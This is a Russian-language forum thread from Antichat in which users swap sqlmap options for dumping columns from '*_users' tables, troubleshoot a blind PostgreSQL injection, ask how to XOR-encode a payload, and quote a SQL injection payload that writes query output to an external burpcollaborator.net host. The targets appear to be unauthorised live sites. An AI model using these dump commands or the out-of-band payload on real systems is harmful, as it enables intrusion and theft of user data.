ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
22.11.2019, 20:31
|
|
Новичок
Регистрация: 08.11.2008
Сообщений: 8
Провел на форуме:
115651
Репутация:
6
|
|
Всем привет.
Как составить запрос в sqlmap, что бы он брал колонки с таблиц в которых содержится "*_users", то есть префиксы бывают разные (blabla1_users, blabla2_users и тд), чувствую что надо как то играться с параметром -T --where, буду очень благодарен за помощь.
|
|
|
24.11.2019, 01:49
|
|
Новичок
Регистрация: 10.04.2019
Сообщений: 14
Провел на форуме:
5258
Репутация:
0
|
|
Если я правильно понял, то --search -C "users". Далее выбрать первый вариант или все поставить на --batch .Тогда он сдампит все колонки где названии рисутствует "users"
|
|
|
|
24.11.2019, 02:53
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
Провел на форуме:
96779
Репутация:
5
|
|
Сообщение от sosidzh24
↑
Если я правильно понял, то --search -C "users". Далее выбрать первый вариант или все поставить на --batch .Тогда он сдампит все колонки где названии рисутствует "users"
--dump еще по идее надо
|
|
|
|
24.11.2019, 05:15
|
|
Новичок
Регистрация: 10.04.2019
Сообщений: 14
Провел на форуме:
5258
Репутация:
0
|
|
Сообщение от karkajoi
↑
--dump еще по идее надо
на --batch он сам сдампит
|
|
|
|
26.11.2019, 02:44
|
|
Познающий
Регистрация: 25.08.2013
Сообщений: 92
Провел на форуме:
35643
Репутация:
3
|
|
-D information_schema -T columns -C table_name,column_name --where="table_name LIKE '%_users'" --dump
нееее, не так? =) dmjROVтестани, если тебе именно колумны с таблов где *_узерс повыводить ннада.
Или я не понял с недосыпа, поздновато уже.
|
|
|
|
05.12.2019, 18:18
|
|
Новичок
Регистрация: 23.03.2013
Сообщений: 1
Провел на форуме:
293
Репутация:
0
|
|
Приветствую!
Ковыряю одну скулю:
SqlMap последней версии
web application technology: Apache, Nginx
back-end DBMS operating system: Linux Debian
back-end DBMS: PostgreSQL
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
ПРОБЛЕМА:При получении ответа на любой запрос постоянно на случайных позициях неправильно определяет символы! Например, получаю имя колонки "user_id", так SqlMap может один раз выдать "use?_id", в другой раз если повторить запрос выдаст ""uQer_id" или "uMe#_id" и т.д. Иногда вообще неотображаемые символы получаются и SqlMap на то ругается:
"cannot properly display (some) Unicode characters inside your terminal ('cp866') environment. All unhandled occurrences will result in replacement with '?' character. Please, find proper character representation inside corresponding output files"
" [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'"
--no-cast и --hex пробовал - не помогает.
Ответы сервера понятные и предсказуемые. Если подставляемое выражение = FALSE то возвращается пустая страница при TRUE возвращается с контентом
Что это может быть? Какие возможные решения данной проблемы?
|
|
|
|
22.12.2019, 00:32
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
Провел на форуме:
59158
Репутация:
2
|
|
Где в sqlmap настройки цветовой палитры?? Хочу изменить цвет текста
|
|
|
|
23.12.2019, 05:45
|
|
Участник форума
Регистрация: 04.05.2017
Сообщений: 244
Провел на форуме:
94763
Репутация:
6
|
|
Ребят такой вопрос известно где находится уязвимость, но не могу понять как мне payload пронать через xor, уязвимый скрипт принимает даные в хоре а потом уже у себя их распаковывает подскажите плиз
def CB_XORm(data, key):
j=0
key = list(key)
data = list(data)
tmp = list()
for i in range(len(data)):
tmp.append(chr(ord(data)^ord(key[j])))
j += 1
if j > (len(key)-1):
j = 0
return "".join(tmp)
|
|
|
|
23.12.2019, 09:18
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от Groove
↑
Где в sqlmap настройки цветовой палитры?? Хочу изменить цвет текста
В настройках терминала
|
|
|
|
24.12.2019, 09:05
|
|
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449
Репутация:
1
|
|
_on=0%20into%20outfile%20'%5c%5c%5c%5cil795b45129i xd3s13rbi2jn1e77v9j0nofb9zy.burpcollaborator.net%5 c%5caju'%3b%20--%20
n parameter appears to be vulnerable to SQL injection attacks. The payload into outfile '\\\\il795b45129ixd3s13rbi2jn1e77v9j0nofb9zy.burpc ollaborator.net\\aju'; --was submitted in the on. This payload causes the database to write the results of the query to a file, and specifies a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
как крутануть такую скулю?мап не берет(
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
